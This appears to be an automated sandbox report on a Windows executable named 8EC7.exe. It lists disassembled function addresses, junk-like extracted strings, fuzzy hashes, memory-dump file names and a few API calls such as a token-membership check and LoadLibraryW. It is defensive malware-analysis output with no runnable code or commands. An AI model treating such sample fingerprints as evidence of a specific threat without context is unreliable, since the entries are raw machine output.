Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID:
String ID: s
API String ID: 0-453955339
Opcode ID: 962c4b59b7776a9692cb6f12416ab3545ce2577ef07dbef2d82514be519948b3
Instruction ID: d5257ff5c316238894263bedf6f19c688e103a0f217fc099a440ea42bf0eee03
Opcode Fuzzy Hash: 962c4b59b7776a9692cb6f12416ab3545ce2577ef07dbef2d82514be519948b3
Instruction Fuzzy Hash: AB31776291C6C19FC3174F254C25A667F686A43306B2900FFC442BE2E3D63D8B06939F

Function 004020E7 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

j1, xrefs: 004020EB

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID:
String ID: j1
API String ID: 0-4002328062
Opcode ID: 4efd56776a1cf48e51d5b8b28f3c88fced1d5df91a33fef9abe88d0c8160b6dd
Instruction ID: 7ffeeb59c018ebe80191c9150d7c44a1840aee0603b3a4286ce7f0937f8dfb2f
Opcode Fuzzy Hash: 4efd56776a1cf48e51d5b8b28f3c88fced1d5df91a33fef9abe88d0c8160b6dd
Instruction Fuzzy Hash: 1EF0287808838899CB02AF36C755B99FF31BF87335F78469ED9962A392C6200649C760

Function 004020B8 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a27345af654d8e993b371437472085dc99020dacbb88babffce4e4e1de5afcb
Instruction ID: 0881589c7ff5ff5768f2d8d6c75c742b5463282b0ed343a47442533531e174b2
Opcode Fuzzy Hash: 1a27345af654d8e993b371437472085dc99020dacbb88babffce4e4e1de5afcb
Instruction Fuzzy Hash: 1D110A3A449345D9C60155278B4AB6BFB707A53730B308667D257267E18979028AE337

Function 004020B6 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7679fe5b6e44f9d9bc89cc9259ef9fe0df295a63758788235af8aeaec9500c5a
Instruction ID: 5e4278b07ce3c8393ea1c67bbc9533801249a46e55f2d55876e4d3ceabbd52a2
Opcode Fuzzy Hash: 7679fe5b6e44f9d9bc89cc9259ef9fe0df295a63758788235af8aeaec9500c5a
Instruction Fuzzy Hash: 3F016174049348D9D7016A36DB4DBA7BB21BB43320F30826BD707352C2C9B4054BE367

Function 004020C4 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55f04470bba513d6a1ff85116eb4bd7e5a7bfe650738b85bdc777e345750bb4e
Instruction ID: 5e560d39f8138ce68ee94cfd6023eaf6832ac934b81d0532f16e67c5e36192ac
Opcode Fuzzy Hash: 55f04470bba513d6a1ff85116eb4bd7e5a7bfe650738b85bdc777e345750bb4e
Instruction Fuzzy Hash: 80018E340493848ECB029B35C71A7A9FF71BF93335F34819FC5571A6E2C6240209D751

Function 004020E3 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f6600757ac2f7f113cd3111149c0096a045daac26c52c0a983afeb1d7d6023c
Instruction ID: fce5d5c764085920edf89c5c9efb60a7985776bdb309a80537f9fa9cbbd5f206
Opcode Fuzzy Hash: 6f6600757ac2f7f113cd3111149c0096a045daac26c52c0a983afeb1d7d6023c
Instruction Fuzzy Hash: 5DF04E7408834499DB416A36C7457A9FB21BF83320F34825FD547256D2CA74054AE711

Function 004020FC Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a78d0ae9cedb3364fca3541f3adf29928ee5114118790e41c8b89e96890051af
Instruction ID: 9ff9efdcd1480cc8040ea01fdd64be9b4a39a154ba86f8cede482a75e84e4065
Opcode Fuzzy Hash: a78d0ae9cedb3364fca3541f3adf29928ee5114118790e41c8b89e96890051af
Instruction Fuzzy Hash: 36F02B7804574859CB02AF37C7416D9FF31BE83235F74464ED4561A392C720060DC760

Function 004025DD Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb15b2d9d84d8bcf95237442851c33c9a576287e722d5cdf4983b928f5d9cc64
Instruction ID: f390e3d0f4c9bd654050140e8d70974a6db2ab88ea7c37a64fdc5b7086b4af87
Opcode Fuzzy Hash: fb15b2d9d84d8bcf95237442851c33c9a576287e722d5cdf4983b928f5d9cc64
Instruction Fuzzy Hash: 24E07227DC33200F87700ECDB0D60086F97B6B03233B60FAACA80333588B328C010288

Function 00402285 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f115ba61ab4e6362ff08d3704e71e4c4144fd1ee34f6209e35425aa647f651c
Instruction ID: de7e959eacdc078ffa18660aebfbf422b397b465e6f902e3b5059cef9d8e7c6e
Opcode Fuzzy Hash: 0f115ba61ab4e6362ff08d3704e71e4c4144fd1ee34f6209e35425aa647f651c
Instruction Fuzzy Hash: 6EF0273944D2488EDB15DF35D2D16BEFF71BE5321076A145CC5C70B102EA200248CBA0

Function 0040267C Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f051c0fcd709177014542cd0273e44ec655c7c60457a6c32fe43c7d43ebeaafc
Instruction ID: c4400a266d698cb3cd2bf7b5ca235fa4f1f280859f6ddc9359233ff16ff34d52
Opcode Fuzzy Hash: f051c0fcd709177014542cd0273e44ec655c7c60457a6c32fe43c7d43ebeaafc
Instruction Fuzzy Hash: B6A00249D125A384C524C50436C041C1A81305ED107689F05D180D9405F348C4C61043

Function 004026DC Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dc631e3e5db65b995aa59b44de7f2b4dcbe59aa107c656cad5b6ec07d9cd269
Instruction ID: 99d9351f112c3ed816393754bebdd5c910e51bb06e2b48d37259af443894e6f8
Opcode Fuzzy Hash: 4dc631e3e5db65b995aa59b44de7f2b4dcbe59aa107c656cad5b6ec07d9cd269
Instruction Fuzzy Hash:

Analysis Process: 8EC7.exePID: 5440, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.4%
Total number of Nodes:	124
Total number of Limit Nodes:	22

Executed Functions

Function 00007FF64160E810 Relevance: 109.0, APIs: 4, Strings: 56, Instructions: 3967COMMON

Download Yara Rule

Strings

hTw*, xrefs: 00007FF641611DE8
yl, xrefs: 00007FF64161212F
5no, xrefs: 00007FF641610CEB
cpHi, xrefs: 00007FF64161021A
cpHi, xrefs: 00007FF64160FCB2
c~D+, xrefs: 00007FF6416100FF
nF, xrefs: 00007FF64161173D
U8PB, xrefs: 00007FF64161100E
nF, xrefs: 00007FF64160F702
{F"7, xrefs: 00007FF6416113AD
dfb, xrefs: 00007FF6416121BC
u|, xrefs: 00007FF641610EA9
e6M , xrefs: 00007FF64161149D
v'Hu, xrefs: 00007FF64160F4D5
d6M , xrefs: 00007FF64160FE7A
g1E, xrefs: 00007FF641611C28
U8PB, xrefs: 00007FF641611CD7
yl, xrefs: 00007FF64160FC52
LK@f, xrefs: 00007FF6416139C0
pcR, xrefs: 00007FF64160FF14
c$&o, xrefs: 00007FF641610CDF
29K&, xrefs: 00007FF641610E60
#{j, xrefs: 00007FF64160FAB9
U8PB, xrefs: 00007FF64161158F
b~D+, xrefs: 00007FF64160E980
29K&, xrefs: 00007FF64161182C
hTw*, xrefs: 00007FF6416109E2
SQ>, xrefs: 00007FF6416130AD
xl, xrefs: 00007FF64160F138
U8PB, xrefs: 00007FF641611CC2
|3\M, xrefs: 00007FF64160F630
mF, xrefs: 00007FF64160EA08
e6M , xrefs: 00007FF64161325C
!@X, xrefs: 00007FF64160FEFD
c~D+, xrefs: 00007FF6416122B3
SQ>, xrefs: 00007FF641611C5C
LK@f, xrefs: 00007FF64160F1C6
SQ>, xrefs: 00007FF641610703
dfb, xrefs: 00007FF6416105AA
GSw', xrefs: 00007FF6416120B5
c$&o, xrefs: 00007FF6416114B8
5no, xrefs: 00007FF64161000D
e6M , xrefs: 00007FF641611082
29K&, xrefs: 00007FF641611594
dl!, xrefs: 00007FF64161108E
GSw', xrefs: 00007FF641610E6C
U8PB, xrefs: 00007FF6416115A2
u|, xrefs: 00007FF64160EBDC
|3\M, xrefs: 00007FF64161389D
SQ>, xrefs: 00007FF64161309C
yl, xrefs: 00007FF64160E874
{3\M, xrefs: 00007FF64160EFCC
#{j, xrefs: 00007FF6416108B4
v'Hu, xrefs: 00007FF641610864
dl!, xrefs: 00007FF64161207D
!@X, xrefs: 00007FF64160EE4F

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: !@X$!@X$#{j$#{j$29K&$29K&$29K&$5no$5no$GSw'$GSw'$LK@f$LK@f$SQ>$SQ>$SQ>$SQ>$U8PB$U8PB$U8PB$U8PB$U8PB$b~D+$c$&o$c$&o$cpHi$cpHi$c~D+$c~D+$d6M $dfb$dfb$dl!$dl!$e6M $e6M $e6M $g1E$hTw*$hTw*$mF$nF$nF$u|$u|$v'Hu$v'Hu$xl$yl$yl$yl${3\M${F"7$|3\M$|3\M$pcR
API String ID: 0-1998008778
Opcode ID: 9a2ff04d6d200e89dbdb88af5bdf8fed4f97cd62d83c3a83ade47878a07dfed0
Instruction ID: e31a04ddab042961301a0a6b9676fff54c50b663d355c9041c369bbcdd543a52
Opcode Fuzzy Hash: 9a2ff04d6d200e89dbdb88af5bdf8fed4f97cd62d83c3a83ade47878a07dfed0
Instruction Fuzzy Hash: D383BB21F0D6D1CAFB7ABB3598A43BE2791EF45344F20453AD64E8BBD4CE28D640A741

Function 00007FF64166F310 Relevance: 3.1, APIs: 2, Instructions: 87
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.KERNELBASE ref: 00007FF64166F3E6
CheckTokenMembership.KERNELBASE(?,?,?,?,?,?,?,?,F4EB9223,?,0645EEAE8F7DAD8E,1063196CE2D18368,?,?,00007FF64160B07B), ref: 00007FF64166F442

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID: AllocateCheckInitializeMembershipToken
String ID:
API String ID: 1663163955-0
Opcode ID: 8819bed3663e1e96ee0d00ee15cf93aa921c6ea50412d524142ccb894634a248
Instruction ID: 1b99faa5fecea95270af552025899b11c059859cf1ea5631a7892cb17c9f25ef
Opcode Fuzzy Hash: 8819bed3663e1e96ee0d00ee15cf93aa921c6ea50412d524142ccb894634a248
Instruction Fuzzy Hash: A431D27260D74986E724AB15F47432F67A0FB84740F10107DEA8E87BA8DF7CD448AB40

Function 00007FF6416707D0 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 589
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

gFW, xrefs: 00007FF641670806
dT, xrefs: 00007FF641670841
gFW, xrefs: 00007FF641670CA8
dT, xrefs: 00007FF641670A92
dT, xrefs: 00007FF641670C8F
gFW, xrefs: 00007FF641671341

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: gFW$gFW$gFW$dT$dT$dT
API String ID: 0-1908915228
Opcode ID: eafbd65168f323bf9e7e5de3815a97b5dcd0c1b3a076008004ab08978d9d03a7
Instruction ID: 3ad8a52c1dd62b22c413d0e814e11eed56aea765a76ec64dd360a1f5e9b23450
Opcode Fuzzy Hash: eafbd65168f323bf9e7e5de3815a97b5dcd0c1b3a076008004ab08978d9d03a7
Instruction Fuzzy Hash: C5429036B0CBC586DBB5B755F4406BA6791E78AB90F10413BCEAD87B98CE3CD440AB50

Function 00007FF641653030 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 247
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

gkB2, xrefs: 00007FF6416531CB
gkB2, xrefs: 00007FF6416534F7
JC<., xrefs: 00007FF6416530A1
KC<., xrefs: 00007FF6416532B3
"Yba, xrefs: 00007FF641653301
KC<., xrefs: 00007FF6416530AC
fkB2, xrefs: 00007FF64165308B
"Yba, xrefs: 00007FF6416533A7

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: "Yba$"Yba$JC<.$KC<.$KC<.$fkB2$gkB2$gkB2
API String ID: 0-2770720463
Opcode ID: 49f70aee238b0ea9206585d699d060682330895e580896f431ba7ef4a8af642f
Instruction ID: 1eb5d6a0298ef9e7981b8037572d1f4616f0f7df0b7141c08a3cfe44abd4cabf
Opcode Fuzzy Hash: 49f70aee238b0ea9206585d699d060682330895e580896f431ba7ef4a8af642f
Instruction Fuzzy Hash: FEB1DA26A0D74591EB76B61DB68033FA790EB45F90FA04036F98DC7796CE2DD880E742

Function 00007FF64166FF60 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-YV, xrefs: 00007FF6416701C7
-YV, xrefs: 00007FF641670055
-YV, xrefs: 00007FF6416700D0
%<L,, xrefs: 00007FF6416703E2
%<L,, xrefs: 00007FF641670147

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: %<L,$%<L,$-YV$-YV$-YV
API String ID: 0-1602977039
Opcode ID: 6dfcfb1db61d7b2f5d834a913636764ef8b3d4bb3454400931b53537016b52b6
Instruction ID: df39d7600b8f6ec1770dbd0efaae61a20bd89116c9e9568ce9c12c6f79a12c66
Opcode Fuzzy Hash: 6dfcfb1db61d7b2f5d834a913636764ef8b3d4bb3454400931b53537016b52b6
Instruction Fuzzy Hash: 93D11922A1DB5585FB62BB69D8802BE23A0BB09788F206537EE4DD3758DF38D5819341

Function 00007FF641675870 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+I}, xrefs: 00007FF641675996
+I}, xrefs: 00007FF641675C10

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: +I}$+I}
API String ID: 0-3898140586
Opcode ID: 838b156c67add71ea4850f9e01a76d00fa210003d949660496066f6e9b33b21c
Instruction ID: 3042b9674dafe196fec60d69cc9d8fab39f65aca990c27ef8483fabaf73ea5bc
Opcode Fuzzy Hash: 838b156c67add71ea4850f9e01a76d00fa210003d949660496066f6e9b33b21c
Instruction Fuzzy Hash: 23812735E1C211CBEB76B625A4D013E66929F85760FB41177E93EC77E0CE2DE880AB01

Function 00007FF641604970 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.4[, xrefs: 00007FF641604B9B
.4[, xrefs: 00007FF641604AAB

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: .4[$ .4[
API String ID: 0-1397926279
Opcode ID: b20a826bc81dfcab3da981ddef80fad3685b7aed7b382253dbf3b8e6d869c42f
Instruction ID: 1d136431957764557a6fb7512450c690f197cb0e31cdf0e63c559dab6228675f
Opcode Fuzzy Hash: b20a826bc81dfcab3da981ddef80fad3685b7aed7b382253dbf3b8e6d869c42f
Instruction Fuzzy Hash: EF51ED12A1EB8885EA22AB3DE4413A9A7A0BF99794F144331FD8D93775DF3CE5C19700

Function 00007FF6416188F7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 00007FF641619314

Strings

H]c, xrefs: 00007FF6416192E6

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID: LibraryLoad
String ID: H]c
API String ID: 1029625771-2876529112
Opcode ID: 22659ce9d2d9c4400367f5563eabec873a4e7434cc56b6bd7b861703e8035eef
Instruction ID: cf191c07fb43ebafb999d85229bd703fc0b8faa6c29cec39b690af0a6faa337b
Opcode Fuzzy Hash: 22659ce9d2d9c4400367f5563eabec873a4e7434cc56b6bd7b861703e8035eef
Instruction Fuzzy Hash: 7451B632A4D68281EF76BA58E0903BE7794FB85760F140632DAADC77E4CE3CD440AB41

Function 00007FF641652BA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

phV, xrefs: 00007FF641652C17

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID:
String ID: phV
API String ID: 0-1350728776
Opcode ID: 1c327526c952085a47468b5600888ca0ba0485a323d74705545f572e516c9b2e
Instruction ID: df7711fa991273160e35c653fbf8859da2e19f9cb15f719f485043039d52cf2f
Opcode Fuzzy Hash: 1c327526c952085a47468b5600888ca0ba0485a323d74705545f572e516c9b2e
Instruction Fuzzy Hash: BB41B422A0C542C1EBB23659A48133D1790AB55774F240B3AEE6DC73DBCE68E8D06341

Function 00007FF641606A50 Relevance: 3.3, APIs: 2, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 00007FF641606B1D

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365634472.00007FF64167D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2365774612.00007FF6416E2000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6415f0000_8EC7.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: c2292ebe08780314e4adfa5601333d20add2fb2094969b9d607540565dfbd5b6
Instruction ID: ba46ef05fbeceba2b18a9c609f382053a0616c02dae94f86dfed158423b7300d
Opcode Fuzzy Hash: c2292ebe08780314e4adfa5601333d20add2fb2094969b9d607540565dfbd5b6
Instruction Fuzzy Hash: DBC15D26B0C25586E77AFA19A49013D6E91DF46350F60413AFD4FE7BE4CE6CE8C06701

Function 00007FF641675680 Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2365573468.00007FF6415F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6415F0000, based on PE: true

Associated: 00000007.00000002.2365545926.00007FF6415F0000.00000002.00000001.01000000.00000006.sdmpDownload File
